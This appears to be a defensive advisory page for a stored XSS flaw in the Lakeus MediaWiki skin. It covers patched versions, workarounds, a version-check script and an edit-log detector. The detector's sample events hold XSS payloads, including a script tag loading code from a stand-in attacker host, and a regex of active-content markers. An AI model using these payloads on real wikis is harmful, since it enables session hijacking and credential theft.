CVE-2025-25287
📋 TL;DR
Lakeus MediaWiki skin versions 1.0.8 through 1.3.0 are vulnerable to stored cross-site scripting (XSS) via malicious system messages. Users with editinterface privileges can inject raw HTML into system messages, potentially affecting all users depending on server configuration. This vulnerability requires administrative privileges to exploit but could lead to session hijacking or credential theft.
💻 Affected Systems
- Lakeus MediaWiki skin
⚠️ Manual Verification Required
Automated version matching may not work for this CVE because not every vulnerability database carries a version range for it, so the installed version has to be checked by hand.
Why? The vendor advisory states the affected range as Lakeus 1.0.8 through 1.3.0 (see TL;DR), but that range is not always propagated to NVD-derived feeds; treat any Lakeus install in that range as affected until the fixed release is confirmed.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
An attacker with editinterface rights injects malicious JavaScript into system messages, leading to session hijacking, credential theft, or complete account compromise for all users accessing affected pages.
Likely Case
Privileged user accidentally or maliciously injects HTML/JavaScript into system messages, causing display issues or limited client-side attacks against users who view the affected messages.
If Mitigated
With editinterface restricted to a few trusted accounts, the remaining exposure is a rogue or compromised interface editor. Of the two vectors, the one through themeDesigner.js only reaches users who have explicitly enabled it in their preferences, so its exposed population is much smaller than that of the footer message, which can reach every visitor of the wiki.
🎯 Exploit Status
Exploitation requires the editinterface right, which MediaWiki grants by default to the sysop and interface-admin groups. The attack consists of editing a system message so that it carries raw HTML/JavaScript; the edit itself is the exploit, no separate tooling is needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.1+REL1.39, 1.3.1+REL1.42, or 1.4.0
Vendor Advisory: https://github.com/lakejason0/mediawiki-skins-Lakeus/security/advisories/GHSA-mq77-3q68-v64v
Restart Required: No
Instructions:
1. Pick the fixed release that matches your MediaWiki branch: MediaWiki 1.39: 1.3.1+REL1.39; MediaWiki 1.42: 1.3.1+REL1.42; current MediaWiki: 1.4.0.
2. Replace the installed skins/Lakeus with that release.
3. Clear MediaWiki caches after the update so that page output rendered by the old code is not served from cache.
🔧 Temporary Workarounds
Restrict editinterface privileges
Limit editinterface to the smallest set of trusted accounts. Rights are assigned per group through $wgGroupPermissions in LocalSettings.php; MediaWiki's defaults grant editinterface to both the sysop and interface-admin groups, so audit both group memberships, not just interface-admin.
Disable themeDesigner.js
Prevent users from enabling themeDesigner.js in their preferences. This only narrows the themeDesigner.js vector; the footer message vector is unaffected by this setting.
🧯 If You Can't Patch
- Review and audit all users with editinterface privileges, removing unnecessary access.
- Deploy a Content Security Policy (MediaWiki provides $wgCSPHeader for this) to limit what injected script can do. CSP blocks script execution, not HTML injection itself: a fake login form or a defaced footer still renders, so CSP reduces the impact rather than removing the vulnerability.
🔍 How to Verify
Check if Vulnerable:
Any Lakeus install reporting a version from 1.0.8 through 1.3.0 inclusive is affected. A "+REL…" suffix is branch build metadata and does not change the comparison: 1.3.1+REL1.39 is version 1.3.1, which is fixed.
Check Version:
Special:Version lists installed skins with their versions; on disk, the "version" field of skins/Lakeus/skin.json carries the same value (MediaWiki skins register through skin.json rather than extension.json).
Verify Fix Applied:
Confirm the version is 1.3.1+REL1.39, 1.3.1+REL1.42 or 1.4.0 (or later on the respective branch). As a functional check on a test wiki, put an HTML tag into the lakeus-footermessage system message (page MediaWiki:Lakeus-footermessage) and confirm that the rendered footer shows it escaped or sanitized rather than inserted verbatim.
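The version comparison above has one trap: the fixed releases carry a "+REL1.39" / "+REL1.42" build suffix, and plain string comparison also misorders versions such as 1.10.0 before 1.3.0. The following is an added example, not code from the Lakeus project or from this advisory's source, that reads the "version" field from a skin.json document and decides whether it falls in the affected range stated on this page; the skins/Lakeus/skin.json path and the sample JSON are assumptions/constructed input.

```python
"""Added example: decide whether an installed Lakeus skin is in the affected
range (1.0.8 through 1.3.0) from the 'version' field of its skin.json.

Not code from the Lakeus project. The skin.json path and the sample document
below are assumptions; only the version facts come from the advisory.
"""
import json
import re
from pathlib import Path

AFFECTED_MIN = (1, 0, 8)   # first affected release per the advisory
AFFECTED_MAX = (1, 3, 0)   # last affected release; 1.3.1+REL* and 1.4.0 are fixed


def parse_version(version: str) -> tuple:
    """Return (major, minor, patch) for a version string.

    Build metadata after '+' is ignored, so '1.3.1+REL1.39' and '1.3.1+REL1.42'
    both parse as (1, 3, 1). Comparing tuples avoids the string-comparison bug
    where '1.10.0' sorts before '1.3.0'.
    """
    core = version.strip()
    if core[:1] in ("v", "V"):
        core = core[1:]
    core = core.split("+", 1)[0]          # drop build metadata such as +REL1.39
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", core)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected(version: str) -> bool:
    """True when the version lies inside the range this advisory lists as affected."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def skin_version_from_json(skin_json_text: str) -> str:
    """Pull the 'version' field out of a skin.json document."""
    return str(json.loads(skin_json_text)["version"])


def check_skin_json(path) -> dict:
    """Read a skin.json from disk (assumed path: skins/Lakeus/skin.json) and report."""
    text = Path(path).read_text(encoding="utf-8")
    version = skin_version_from_json(text)
    return {"version": version, "affected": is_affected(version)}


if __name__ == "__main__":
    # Constructed sample of what an unpatched 1.3.0 install's skin.json might hold.
    sample = json.dumps({"name": "Lakeus", "version": "1.3.0", "manifest_version": 2})
    for v in (skin_version_from_json(sample), "1.3.1+REL1.39", "1.3.1+REL1.42", "1.4.0"):
        print(f"Lakeus {v}: {'AFFECTED' if is_affected(v) else 'not in affected range'}")
```

Run it against the real file with check_skin_json("skins/Lakeus/skin.json") from the wiki root; versions below 1.0.8 are reported as outside the range because the advisory does not list them, not because they were audited.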
📡 Detection & Monitoring
Log Indicators:
- Unusual system message edits by users with editinterface rights
- Multiple rapid edits to lakeus-footermessage or themeDesigner.js messages
Network Indicators:
- Unexpected outbound requests from browsers rendering Lakeus-skinned pages (for example to hosts the wiki does not normally reference), or CSP violation reports for inline script if a policy is deployed
SIEM Query:
source="mediawiki" AND event="edit" AND (target_message="lakeus-footermessage" OR target_message="themeDesigner.js")
(The parentheses matter: without them the AND/OR precedence makes the query match every edit to themeDesigner.js regardless of source. Field names are illustrative and depend on how your pipeline maps MediaWiki edit events.)
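The log indicators and the SIEM query above describe the detection in prose; the following is an added example, not MediaWiki or Lakeus code, that applies them to a stream of edit events: it flags every edit to the two watched system-message pages, raises severity when the saved text carries script-bearing markup, and fires once when one user edits the same message repeatedly within a short window. The JSON event shape (source, event, user, title, ts, text) and the sample events are constructed to mirror the query's field names and are not a real MediaWiki log format.

```python
"""Added example: detect edits to the Lakeus-related system messages in an
edit-event stream (one JSON object per line) and flag suspicious patterns.

Not code from MediaWiki or the Lakeus project. The event shape and the sample
events are constructed; map them onto your own edit log before use.
"""
import json
import re
from collections import defaultdict

# Page titles under which the two message keys are edited. MediaWiki
# capitalises the first letter of a message key when it becomes a page title.
WATCHED_TITLES = {"mediawiki:lakeus-footermessage", "mediawiki:themedesigner.js"}

# Crude markers of active content in the saved text. Absence is NOT proof of
# safety; this only raises severity on the obvious cases.
ACTIVE_CONTENT = re.compile(r"<script|javascript:|\son\w+\s*=|<iframe|<object|<embed", re.I)

RAPID_EDITS = 3        # this many edits ...
RAPID_WINDOW_S = 300   # ... to one watched title by one user within 5 minutes

# Constructed sample events (not from a real wiki).
SAMPLE_EVENTS = [
    {"source": "mediawiki", "event": "edit", "user": "Alice", "title": "MediaWiki:Common.css",
     "ts": 1000, "text": "body { margin: 0 }"},
    {"source": "mediawiki", "event": "edit", "user": "Mallory", "title": "MediaWiki:Lakeus-footermessage",
     "ts": 1100, "text": "Powered by Lakeus"},
    {"source": "mediawiki", "event": "edit", "user": "Mallory", "title": "MediaWiki:Lakeus-footermessage",
     "ts": 1160, "text": '<img src=x onerror="alert(1)">'},
    {"source": "mediawiki", "event": "edit", "user": "Mallory", "title": "MediaWiki:Lakeus-footermessage",
     "ts": 1200, "text": '<script src="https://attacker.invalid/x.js"></script>'},
    {"source": "mediawiki", "event": "edit", "user": "Bob", "title": "MediaWiki:ThemeDesigner.js",
     "ts": 1300, "text": "Theme designer message text"},
    {"source": "nginx", "event": "request", "ts": 1400, "path": "/index.php?title=Main_Page"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS) + "\nnot json at all\n"


def parse_events(lines):
    """Parse one JSON object per line; lines that are not valid JSON are skipped."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def detect(events):
    """Return alert dicts for edits to the watched system messages."""
    alerts = []
    history = defaultdict(list)   # (user, title) -> recent edit timestamps
    fired = set()                 # keys that already raised a rapid-edit alert
    for ev in sorted(events, key=lambda e: e.get("ts", 0)):
        if ev.get("source") != "mediawiki" or ev.get("event") != "edit":
            continue
        title = str(ev.get("title", "")).lower().replace(" ", "_")
        if title not in WATCHED_TITLES:
            continue
        user, ts = ev.get("user", "?"), ev.get("ts", 0)
        base = {"user": user, "title": ev.get("title"), "ts": ts}
        alerts.append({"severity": "medium", "reason": "watched system message edited", **base})
        if ACTIVE_CONTENT.search(ev.get("text", "")):
            alerts.append({"severity": "high", "reason": "active content in system message", **base})
        key = (user, title)
        history[key] = [t for t in history[key] if ts - t <= RAPID_WINDOW_S] + [ts]
        if len(history[key]) >= RAPID_EDITS and key not in fired:
            fired.add(key)
            alerts.append({"severity": "high", "reason": "rapid repeated edits", **base})
    return alerts


def run_sample():
    """Run the detector over the constructed sample log."""
    return detect(parse_events(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On the sample, Mallory's three edits produce three medium alerts, two active-content alerts and one rapid-edit alert, Bob's edit to MediaWiki:ThemeDesigner.js produces one medium alert, and the Common.css edit, the nginx line and the malformed line are ignored. The medium alert on every watched edit is deliberate: with editinterface limited to a handful of accounts, these pages should change rarely enough that each edit deserves a human look.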
🔗 References
- https://github.com/lakejason0/mediawiki-skins-Lakeus/blob/82ad2cd341f85b814a6a0f37969e6210ebf2521d/includes/SkinLakeus.php#L27
- https://github.com/lakejason0/mediawiki-skins-Lakeus/blob/82ad2cd341f85b814a6a0f37969e6210ebf2521d/resources/themeDesigner.js
- https://github.com/lakejason0/mediawiki-skins-Lakeus/commit/fb79928f06efa47677fff27e0f4755eb32b1c8d9
- https://github.com/lakejason0/mediawiki-skins-Lakeus/security/advisories/GHSA-mq77-3q68-v64v